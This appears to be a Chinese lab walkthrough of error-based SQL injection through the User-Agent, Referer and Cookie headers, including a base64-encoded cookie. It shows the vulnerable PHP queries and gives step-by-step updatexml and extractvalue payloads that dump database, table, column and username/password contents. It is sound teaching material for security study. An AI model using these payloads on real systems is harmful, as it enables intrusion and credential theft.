http字段注入
使用burp拦截post请求,修改字段内容后,放包
User-Agent注入
1.正常登录页面:
2.拦截登录请求:
修改User-Agent内容为aaa,放包,页面改变:
3.通过修改User-Agent进行报错注入:
源代码:
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
找到注入点:
1',1,1)#
获取数据库名:
1',1,updatexml(1,concat(0x7e,(select database()),0x7e),1))#
获取表名:
1',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
获取users表下的字段名:
1',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))#
获取users表内容:
1',1,updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1))#
获取users表后面的内容:
1',1,updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),31),1))#
Referer注入
1.正常登陆页面:
2.拦截登录请求,修改Referer为aaa,放包,页面改变:
3.通过修改Referer进行报错注入:
源代码:
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
找到注入点:
1',1)#
获取数据库名:
1',updatexml(1,concat(0x7e,(select database()),0x7e),1))#
获取数据库下表名:
1',updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
获取users表下字段名:
1',updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))#
获取users表内容:
1',updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1))#
获取users表后面的内容:
1',updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),31),1))#
cookie注入
1.正常登录:
2.拦截get包,并修改Cookie为admin’,放包,报错:
admin'
3.通过修改Cookie进行报错注入:
源代码:
$cookee = $_COOKIE['uname'];
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
获取数据库名:
admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #
获取该数据库下表名
admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e)) #
获取users表下字段名:
admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e)) #
获取users表内容:
admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e)) #
获取users表后面的内容:
admin' and extractvalue(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),31)) #
Base64编码的Cookie注入:
1.正常登录页面:
发现uname使用base64编码过
2.将admin‘进行base64编码后,拦截下get包,修改Cookie值,放包,报错:
3.通过修改Cookie进行报错注入:
源代码:
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
注入点:
admin') #
YWRtaW4nKSAj
获取数据库名:
admin') and extractvalue(1,concat(0x7e,(select database()),0x7e)) #
YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkgIw
其他步骤相同